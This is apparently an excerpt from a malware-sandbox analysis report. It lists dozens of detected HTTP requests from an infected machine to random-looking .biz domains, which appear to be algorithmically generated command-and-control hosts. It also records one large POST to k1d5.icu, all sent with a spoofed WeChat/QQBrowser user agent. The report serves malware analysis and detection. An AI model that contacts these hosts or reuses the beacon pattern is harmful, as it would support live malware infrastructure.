              Source: global trafficHTTP traffic detected: GET /b?usid=18&utid=30152678348 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
              Source: global trafficHTTP traffic detected: POST /TP341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: k1d5.icuContent-Length: 42988Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /iqbvkcsnipxly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
              Source: global trafficHTTP traffic detected: GET /gedtsq?usid=18&utid=30152678479 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: POST /en HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: GET /en?usid=18&utid=30152678739 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
              Source: global trafficHTTP traffic detected: POST /wt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
              Source: global trafficHTTP traffic detected: POST /xfhngbevi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /aopfhnckuovs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /reeuv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fkj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mtrjsdrytjxvslm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dnmpvtql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /lljqple HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yxchsqwoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /eyajoanbw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wgmealrwqlbauh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yhikx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: GET /yhikx?usid=18&utid=30152687280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
              Source: global trafficHTTP traffic detected: POST /xrkixnpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: GET /xrkixnpk?usid=18&utid=30152687444 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
              Source: global trafficHTTP traffic detected: POST /rrvggovttpevpbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ljnlowt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ayiycmrfnan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kqipv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tpyri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kkcqqeuyeyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vipn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /xtqnbvhp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /if HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /seueafvlbcmx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vqrfhgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jqlotfcyykbfgsp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cuxawpwbnkhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jttp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wpnrqhmpnuisgi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /xhfpy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /llkyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /edke HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gtvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kfeqymn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kgihcqktxx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /op HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /aywxxumeinieee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ksbp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /shrlpi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mgwvuleuoxgka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /taq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rgpseg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fkkyxxyvwxtnw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /muicwswwpsvuoaa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /obax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vspbg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /smhxeb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cmutmcflogtu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jfsimcxiyb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /iuxqrsqameemay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /btxiqnehclrfsqon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /nbbgwwsoahqctkx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
